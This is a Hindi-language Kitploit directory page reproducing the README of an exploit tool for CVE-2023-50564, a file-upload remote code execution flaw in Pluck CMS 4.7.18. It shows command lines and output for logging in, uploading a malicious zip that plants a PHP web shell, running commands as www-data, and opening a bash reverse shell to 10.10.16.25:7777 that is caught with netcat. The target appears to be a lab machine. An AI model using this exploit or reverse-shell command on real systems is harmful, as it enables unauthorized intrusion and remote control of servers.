Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-50564 — Pluck-CMS v4.7.18 RCE एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/xpltive/cve-2023-50564
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubxpltive/cve-2023-50564

CVE-2023-50564

Pluck-CMS v4.7.18 RCE एक्सप्लॉइट

रिपॉजिटरी देखें
11571 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-50564

CVE-2023-50564, Pluck CMS v4.7.18 में एक RCE कमजोरी है। यह /inc/modules_install.php कंपोनेंट में एक मनमानी फ़ाइल अपलोड कमजोरी के माध्यम से संभव है, जो एक दुर्भावनापूर्ण .zip फ़ाइल अपलोड करके मनमाना कोड निष्पादित करने की अनुमति देती है।

उपयोग

एक्सप्लॉइट चलाने से पहले, /login.php पर प्रमाणित करने के लिए पासवर्ड ज्ञात होना चाहिए।

लक्ष्य के विरुद्ध एक्सप्लॉइट चलाना:

root@kitploit:~
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1          
[+] Creating payload malicious.zip                                    
[+] Logging in                                                                                                                              
[+] Login successful                                                                                                                        
[+] Uploading malicious.zip                                        
[+] Upload successful                                                                                                                                                                                                                                                                    
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>

दुर्भावनापूर्ण .php फ़ाइल को स्क्रिप्ट द्वारा प्रदान किए गए लिंक के माध्यम से एक्सेस किया जा सकता है ताकि कमांड निष्पादित किए जा सकें।

वैकल्पिक रूप से, --cmd फ़्लैग का उपयोग करके निष्पादित किए जाने वाले कमांड निर्दिष्ट किए जा सकते हैं।

root@kitploit:~
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip                                                                                                          
[+] Logging in                                                                                                                              
[+] Login successful                                                                                                                        
[+] Uploading malicious.zip                                                                                                                 
[+] Upload successful                             
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>                                             
[+] Executing command 'id'                                                                                                                  
                                                                      
uid=33(www-data) gid=33(www-data) groups=33(www-data)

रिवर्स शेल

लिसनर प्रारंभ करें, फिर --cmd फ़्लैग का उपयोग करके लिसनर पर रिवर्स शेल कनेक्शन स्थापित करने के लिए एक कमांड निर्दिष्ट करें:

root@kitploit:~
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"                                                                                                                                                    
[+] Creating payload malicious.zip                                                                                                          
[+] Logging in                                                                                                                              
[+] Login successful                     
[+] Uploading malicious.zip                                                                                                                 
[+] Upload successful                                                                                                                       
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>                                             
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''

और लिसनर पर कनेक्शन प्राप्त करें:

root@kitploit:~
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$

स्थापना

आवश्यकताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

सहायता:

root@kitploit:~
$ python3 exploit.py --help                                                                               
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]

Exploit Pluck v4.7.18 RCE Vulnerability

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL (Example: http://greenhorn.htb)
  --password PASSWORD  Pluck password
  --cmd CMD            Command to execute

क्रेडिट्स

क्रेडिट्स Mirabbas Ağalarov को जिन्होंने कमजोरी की खोज की (लिंक).

टूल डाउनलोड करें